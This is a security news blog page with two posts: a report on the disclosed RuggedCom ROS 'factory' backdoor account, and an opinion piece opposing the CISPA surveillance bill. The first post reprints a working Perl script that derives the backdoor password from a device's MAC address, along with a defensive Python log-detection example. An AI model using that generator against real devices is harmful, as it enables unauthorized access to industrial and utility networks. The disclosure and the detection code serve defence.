Your security, networking, programming, and application news source.

Tuesday, April 24, 2012

RuggedCom Unresponsive, Rugged Operating System (ROS®) Backdoor Disclosed

A factory backdoor account in RuggedCom's Rugged Operating System (ROS®) has been disclosed. RuggedCom is a manufacturer of rugged networking equipment popular in the industrial, utility, and defense industries. RuggedCom has acknowledged the backdoor and has recently informed these customers, whose networking devices are frequently security sensitive. Due in part to RuggedCom's unresponsiveness after that acknowledgement, the information was publicly disclosed. According to the disclosure, an undocumented account, "factory", which cannot be disabled, is included in all released versions of ROS® with a password generated from the device's MAC address.

Secunia - Full Disclosure CVE-2012-1803 (April 23, 2012)

#!/usr/bin/perl
if (! defined $ARGV[0]) {
    print "+========================================== \n";
    print "+ RuggedCom ROS Backdoor Password Generator \n";
    print "+ JC CREW April 23 2012 \n";
    print "+ Usage:\n$0 macaddress \n";
    print "+========================================== \n";
    exit;
}
$a = $ARGV[0];
$a =~  s/[^A-F0-9]+//simg;
@b = reverse split /(\S{2})/,$a;
$c = join "", @b;
$c .= "0000";
$d = hex($c) % 999999929;
print "$d\n";
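
Because the "factory" account cannot be disabled, any authentication event that names it is worth alerting on. The following is an added detection example, not part of the original post or the disclosure: it scans constructed log lines in an assumed generic syslog-like layout (not the ROS log format) and grades each "factory" login by result and by whether the source sits inside an assumed management subnet (10.20.0.0/24). All host names, addresses, and function names are hypothetical.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed sample lines in a generic syslog-like layout (an assumption;
# this is NOT the ROS log format). Adapt LINE_RE to your collector's output.
SAMPLE_LOG = """\
2012-04-24T09:12:01 sw-sub01 auth: login ok user=admin src=10.20.0.15 proto=ssh
2012-04-24T09:14:37 sw-sub01 auth: login failed user=factory src=192.0.2.77 proto=telnet
2012-04-24T09:14:52 sw-sub01 auth: login ok user=Factory src=192.0.2.77 proto=telnet
2012-04-24T10:02:10 sw-sub02 auth: login ok user=factory src=10.20.0.15 proto=ssh
2012-04-24T10:05:00 sw-sub02 auth: login ok user=operator src=10.20.0.16 proto=ssh
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<host>\S+) auth: login (?P<result>ok|failed) "
    r"user=(?P<user>\S+) src=(?P<src>\S+) proto=(?P<proto>\S+)$"
)
BACKDOOR_USER = "factory"  # account name given in the disclosure
MGMT_NETS = [ipaddress.ip_network("10.20.0.0/24")]  # assumed management subnet


def find_factory_logins(log_text, mgmt_nets=MGMT_NETS):
    """Return one alert dict per auth event that names the factory account."""
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        # Compare case-insensitively so variants such as "Factory" are not missed.
        if not m or m["user"].lower() != BACKDOOR_USER:
            continue
        src = ipaddress.ip_address(m["src"])
        in_mgmt = any(src in net for net in mgmt_nets)
        if m["result"] == "ok":
            # Success from outside the management network is the worst case.
            severity = "high" if in_mgmt else "critical"
        else:
            severity = "medium"  # a failed attempt still shows the account is being tried
        alerts.append({"ts": m["ts"], "host": m["host"], "src": str(src),
                       "result": m["result"], "severity": severity})
    return alerts


def summarize(alerts):
    """Group alert severities by device so affected hosts stand out."""
    by_host = defaultdict(list)
    for a in alerts:
        by_host[a["host"]].append(a["severity"])
    return dict(by_host)


if __name__ == "__main__":
    for alert in find_factory_logins(SAMPLE_LOG):
        print(alert)
```
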

Sunday, April 22, 2012

CISPA - US Internet Surveillance Bill

Customers voice their opinion to supporters of the newest dangerous Internet bill, CISPA (H.R. 3523).



Cyber Intelligence Sharing and Protection Act (CISPA), also known as H.R. 3523, is not just another horribly irresponsible SOPA / PIPA. This bill focuses on a real issue, but does it in the most horrible and irresponsible way possible.

CISPA is meant to lay the foundation for private companies and Internet service providers to share information with the US Government about cyber security threats. The main problems are the lack of any real definition of what a threat is, the bypassing of all existing laws to protect collection and sharing of your personal data by private companies, the lack of restriction of what information can be shared and with whom, the warrant-less unrestricted sharing of data with the NSA, DHS, and other government agencies, and encouragement of heavy broad surveillance of citizens.

This bill will directly encourage private companies such as your cellular carrier (Verizon / AT&T), your operating system (Microsoft), your antivirus scanner (Symantec), and your Internet service provider (ISP) to collect huge amounts of your personal data to a level that would previously be illegal. This CISPA authority would override privacy protection laws (such as protecting of your medical records), local eavesdropping and wiretapping laws, and allow collection of almost any data based on recklessly vague "cybersecurity" purposes. These private companies would be able to collect this data anonymously without ever having to tell you they collected it or what they collected. They would be free to share the data with any company they want, possibly even selling the data, with complete immunity to legal actions such as lawsuits or criminal charges for privacy violations. They would be allowed to dump all this data on any US Government agency without requiring a warrant.

This is in the wake of the NSA beginning building the country's biggest spy center in Utah. As well as a recent NSA whistle-blower's claim that the US Government has illegally been engaged in widespread Internet surveillance for quite some time, having intercepted 20 trillion communications, and has copies of "most of your Emails". Again, illegally and therefore with no oversight, I might add.

CISPA (H.R. 3523) is another horrible, dangerous, and irresponsible bill that will erode all existing personal data and privacy protection laws, and give ALL your data to private companies to use and abuse under the table with complete immunity from legal repercussions.

Verizon disgustingly supports this bill. We call on you, Verizon, to change your stance away from this strong-arm theft and abuse of citizens' personal data!

Verizon's letter of support for CISPA:
http://intelligence.house.gov/sites/intelligence.house.gov/files/documents/Verizon113011.pdf


More Information:

Electronic Freedom Foundation:
http://cyberspying.eff.org/

TIME Magazine:
http://techland.time.com/2012/04/19/5-reasons-the-cispa-cybersecurity-bill-should-be-tossed/



Source: Verizon Wireless Community Forum
April 22, 2012 12:00PM
(The original text has been modified for formatting, linking, and alignment.)

Some other supporters:
  • AT&T
  • Boeing
  • BSA
  • Business Roundtable
  • CSC
  • COMPTEL
  • CTIA - The Wireless Association
  • Cyber, Space & Intelligence Association
  • Edison Electric
  • EMC
  • Exelon
  • Facebook
  • The Financial Services Roundtable
  • IBM
  • Independent Telephone & Telecommunications Alliance
  • Information Technology Industry Council
  • Intel
  • Internet Security Alliance
  • Lockheed Martin
  • Microsoft
  • National Cable & Telecommunications Association
  • NDIA
  • Oracle
  • Symantec
  • TechAmerica
  • US Chamber of Commerce
  • US Telecom - The Broadband Association
  • Verizon